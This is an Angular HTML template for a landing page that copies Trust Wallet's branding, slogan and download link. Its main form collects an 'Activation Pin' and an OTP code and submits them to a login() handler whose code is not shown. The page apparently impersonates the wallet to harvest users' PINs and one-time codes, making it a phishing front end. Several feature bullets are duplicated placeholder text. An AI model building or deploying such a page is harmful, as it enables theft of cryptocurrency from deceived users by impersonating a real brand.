<div class="w-full h-full">
    <div class=" w-full lg:h-[120vh] md:h-[80vh] h-[80vh] flex items-center justify-center">
        <div class="w-[90%] h-[80vh] lg:h-full ">
         <div class="w-full h-full">
            <div class="flex flex-wrap lg:flex-nowrap h-[100vh] lg:h-[100vh]">
                <div class="flex flex-col w-[100%] lg:w-[50%]  h-[80%] lg:h-full ">
                    <div class="h-[30%] flex items-center justify-center py-4">
                        <h1 class=" md:w-[70%] 
                        text-center md:text-center lg:text-start 
                        lg:w-[80%] display-3 text-white font-weight-bold">
                        The most trusted &amp; secure crypto wallet</h1>
                    </div>
                    <div class="form flex flex-col items-center justify-center">
                        <!-- <form #cryptoForm class="w-[80%]" (ngSubmit)="login()">
                            <input placeholder="Active password " type="password
                            " class="w-[30vw] h-[5vh] rounded-lg p-4 " id="active-password" #activePassword/><br><br>

                            <input placeholder="OTP Code" type="text" class="w-[30vw] h-[5vh] rounded-lg p-4" #otp />
                            <br><br>
                            <button type="submit" class="p-4 bg-blue-900 rounded-md px-8 text-white">Submit</button>
                        </form>
                        <p class="text-red-400">{{activePassword.value}}</p> -->
                        <form class="w-[80%] py-2" #loginForm="ngForm" (ngSubmit)="login() ">
                            <!-- Active password -->
                            <div class="mb-6 lg:w-[30vw] w-[100%] h-[5vh]">
                                <input type="password" name="ActivePassword"
                                 [(ngModel)]="credentials.ActivePassword"
                                 #password="ngModel"
                                 placeholder="Activation Pin" class="block 
                                 w-full py-1.5 px-3  text-blue-400 border-2 border-gray-400 transition
                                duration-500 focus:outline-none rounded bg-white
                                focus:border-indigo-400" 
                                required 
                                 />
                                 <p *ngIf="password.errors && password.touched && password.dirty" 
                                 class="text-red-400">
                                    Activation Pin Required
                                  </p>
                            </div>
                            <!-- OTP -->
                            <div class="mb-6 lg:w-[30vw] w-[100%] h-[5vh]">
                                <input type="password" name="password" [(ngModel)]="credentials.password"
                                 #Activepassword="ngModel"
                                 placeholder="OTP" class="block w-full py-1.5 px-3
                                   text-blue-400 border-2 border-gray-400 transition
                                duration-500 focus:outline-none rounded bg-white
                                focus:border-indigo-400" 
                                required 
                                 />
                                 <p *ngIf="Activepassword.errors && Activepassword.touched && 
                                 Activepassword.dirty" class="text-red-400">
                                    OTP required
                                  </p>
                            </div>
                            <!-- submit btn  -->
                            <button type="submit" [disabled]="loginForm.invalid"
                                class="blockp-4 bg-blue-900 rounded-md px-8 text-white py-1.5 transition
                                 hover:bg-indigo-500 disabled:opacity-50 disabled:bg-indigo-400">
                                 Submit
                            </button>
                        </form>
                        <div class="w-[80%]">
                            <p class="lead text-center md:text-start lg:text-start  text-white-90 lead mb-4">Buy, store, collect NFTs, exchange &amp; earn crypto. Join 25 million+ people using Trust Wallet.</p>
                        </div>
                        <!-- <div>{{ loginForm.valid}}</div>  -->
                    </div>
                    <!-- <div>{{ loginForm.autocomplete }}</div>  --> 
                </div>
                <div class="flex items-center w-[100%] lg:w-[50%] lg:h-full h-[80%]">
                    <div>
                        <img src="../../../assets/home_hero.png" class="lg:object-contain object-cover"/>
                    </div>  
                </div>
            </div>
        </div> 
    </div>
</div>

<div class="w-full h-[180vh] lg:h-[100vh] mt-[100vh] lg:mt-0 bg-white 
   relative flex justify-center items-center">
    <div class="w-[90%] h-[90%]">
      <div class="flex flex-col justify-center ">
        <div class="grid lg:grid-cols-3">
            <div class="flex justify-center items-center lg:w-[30vw]">
                <span class="flex w-full justify-center lg:w-[90%]">
                    <span class="w-[12%] flex items-center"><img src="../../../assets/save.JPG"/></span>
                    <span class="w-[88%] lead-1 text-center lg:text-start">Buy Crypto With a card</span>
                </span>
            </div>
            <div class="flex justify-center items-center lg:w-[30vw] ">
                <span class="flex  justify-center w-[90%]">
                    <span class="w-[10%] flex items-center"><img src="../../../assets/exchange.JPG"/></span>
                    <span class="w-[90%] lead-1 text-center lg:text-start ">Exchange Instantly </span>
                </span>
            </div>
            <div class="flex justify-center items-center lg:w-[30vw] ">
                <span class="flex  justify-center w-[90%]">
                    <span class="w-[8%] flex items-center"><img src="../../../assets/secure.JPG"/></span>
                    <span class="w-[92%] lead-1 text-center lg:text-start ">Private & Secure </span>
                </span>
            </div>
            <!-- <div class="w-[30vw] border-red-400 border-4">01</div>
            <div class="w-[30vw] border-red-400 border-4">01</div> -->
        </div>
        <div>
            <div class="flex flex-col items-center justify-center pt-16 pb-8 lg:pt-0">  
                <h2 class="display-4 text-center lg:text-start font-weight-bold mb-4">You Deserve Easy Access to Cryptocurrencies</h2>
                <p class="leading-5 text-gray-700">Trust Wallet is for you if you want to</p>
            </div>
        </div>
        <div>
            <div class="flex flex-wrap lg:flex-nowrap justify-center w-full ">
                <div class="w-[100%] lg:w-[50%] flex  items-center justify-center lg:justify-end p-4">
                    <span class="flex">
                        <span class="flex items-start lg:items-center w-[20%] lg:w-[5%]">
                            <img src="../../../assets/check.svg" alt="check"/></span>
                        <span class="flex items-start lg:items-center  w-[80%] lg:w-[95%] ml-2 text-center">Buy bitcoin under five minutes</span>
                    </span>
                </div>
                <div class="w-[100%] lg:w-[50%] flex  items-center justify-center lg:justify-start p-4">
                    <span class="flex">
                        <span class="flex items-start lg:items-center w-[20%] lg:w-[5%]">
                            <img src="../../../assets/check.svg" alt="check"/></span>
                        <span class="flex items-start lg:items-center  w-[80%] lg:w-[95%] ml-2 text-center">Exchange without leaving the app</span>
                    </span>
                </div>
            </div>
            <div class="flex flex-wrap lg:flex-nowrap justify-center w-full ">
                <div class="w-[100%] lg:w-[50%] flex  items-center justify-center lg:justify-end p-4">
                    <span class="flex">
                        <span class="flex items-start lg:items-center w-[20%] lg:w-[5%]">
                            <img src="../../../assets/check.svg" alt="check"/></span>
                        <span class="flex items-start lg:items-center  w-[80%] lg:w-[95%] ml-2 text-center">Buy bitcoin under five minutes</span>
                    </span>
                </div>
                <div class="w-[100%] lg:w-[50%] flex  items-center justify-center lg:justify-start p-4">
                    <span class="flex">
                        <span class="flex items-start lg:items-center w-[20%] lg:w-[5%]">
                            <img src="../../../assets/check.svg" alt="check"/></span>
                        <span class="flex items-start lg:items-center  w-[80%] lg:w-[95%] ml-2 text-center">Buy bitcoin under five minutes</span>
                    </span>
                </div>
            </div>
            <div class="flex flex-wrap lg:flex-nowrap justify-center w-full ">
                <div class="w-[100%] lg:w-[50%] flex  items-center justify-center lg:justify-end p-4">
                    <span class="flex">
                        <span class="flex items-start lg:items-center w-[20%] lg:w-[5%]">
                            <img src="../../../assets/check.svg" alt="check"/></span>
                        <span class="flex items-start lg:items-center  w-[80%] lg:w-[95%] ml-2 text-center">Buy bitcoin under five minutes</span>
                    </span>
                </div>
                <div class="w-[100%] lg:w-[50%] flex  items-center justify-center lg:justify-start p-4">
                    <span class="flex">
                        <span class="flex items-start lg:items-center w-[20%] lg:w-[5%]">
                            <img src="../../../assets/check.svg" alt="check"/></span>
                        <span class="flex items-start lg:items-center  w-[80%] lg:w-[95%] ml-2 text-center">Buy bitcoin under five minutes</span>
                    </span>
                </div>
            </div>
        </div>
        <div class="mt-8 flex justify-center">
            <a href="https://play.google.com/store/apps/details?id=com.wallet.crypto.trustapp&referrer=utm_source%3Dwebsite&pli=1" class="btn text-white bg-blue-600 rounded-md hover:bg-blue-900 p-4 mx-auto downloadapp-native" aria-label="goes to download page to get Trust Wallet App">
                Download Now
            </a>
        </div>
      </div>
    </div>
</div>

